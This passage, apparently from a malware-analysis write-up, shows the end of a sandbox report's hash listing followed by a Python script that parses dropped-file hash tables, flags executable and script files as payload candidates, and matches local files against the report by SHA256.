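C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI38322\\tzdata\\zoneinfo\\UCT
| MD5 | 51d8a0e68892ebf0854a1b4250ffb26b |
| SHA1 | b3ea2db080cd92273d70a8795d1f6378ac1d2b74 |
| SHA256 | fddce1e648a1732ac29afd9a16151b2973cdf082e7ec0c690f7e42be6b598b93 |
| SHA512 | 4d0def0cd33012754835b27078d64141503c8762e7fb0f74ac669b8e2768deeba14900feef6174f65b1c3dd2ea0ce9a73bba499275c1c75bcae91cd266262b78 |
"""

# Expected hex-digest lengths; a row of any other length is a transcription error, not an IOC.
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")

# Heuristic (my assumption, not the report's): extensions that mark a dropped payload or script.
PAYLOAD_EXTS = {".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js"}


@dataclass
class DroppedFile:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)

    @property
    def name(self) -> str:
        return PureWindowsPath(self.path).name


def parse_report(text: str) -> List[DroppedFile]:
    """A non-table line starts a new record; each following table row adds one digest to it."""
    records: List[DroppedFile] = []
    current: Optional[DroppedFile] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            current = DroppedFile(path=line)
            records.append(current)
            continue
        if current is None:
            raise ValueError(f"hash row before any path line: {line}")
        alg, digest = m.group(1), m.group(2).lower()
        if len(digest) != HEX_LEN[alg]:
            raise ValueError(
                f"{current.path}: {alg} has {len(digest)} hex chars, expected {HEX_LEN[alg]}"
            )
        current.hashes[alg] = digest
    return records


def payload_candidates(records: List[DroppedFile]) -> List[DroppedFile]:
    """Keep executables and scripts; drop browser profile data and runtime support files."""
    return [r for r in records if PureWindowsPath(r.path).suffix.lower() in PAYLOAD_EXTS]


def index_by_sha256(records: List[DroppedFile]) -> Dict[str, DroppedFile]:
    return {r.hashes["SHA256"]: r for r in records if "SHA256" in r.hashes}


def hash_bytes(data: bytes) -> Dict[str, str]:
    """Compute all four digests the report carries, keyed by the report's algorithm names."""
    return {alg: getattr(hashlib, alg.lower())(data).hexdigest() for alg in HEX_LEN}


def match_bytes(data: bytes, index: Dict[str, DroppedFile]) -> Optional[DroppedFile]:
    """Look a file's content up by SHA256; returns the report record on a hit, else None."""
    return index.get(hashlib.sha256(data).hexdigest())


def verify_all(data: bytes, record: DroppedFile) -> Dict[str, bool]:
    """Per-algorithm agreement between local content and the record; all four should agree."""
    local = hash_bytes(data)
    return {alg: local[alg] == digest for alg, digest in record.hashes.items()}


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    idx = index_by_sha256(recs)
    for r in payload_candidates(recs):
        print(f"payload candidate: {r.name} sha256={r.hashes['SHA256']}")
    print("match for unrelated bytes:", match_bytes(b"not a dropped file", idx))
```

Running the script against the full listing yields the six payload candidates named above and skips the tzdata, Firefox, Chrome and Edge entries; `verify_all` is there for the case where a SHA256 hit must be confirmed against the other three digests before the file is escalated.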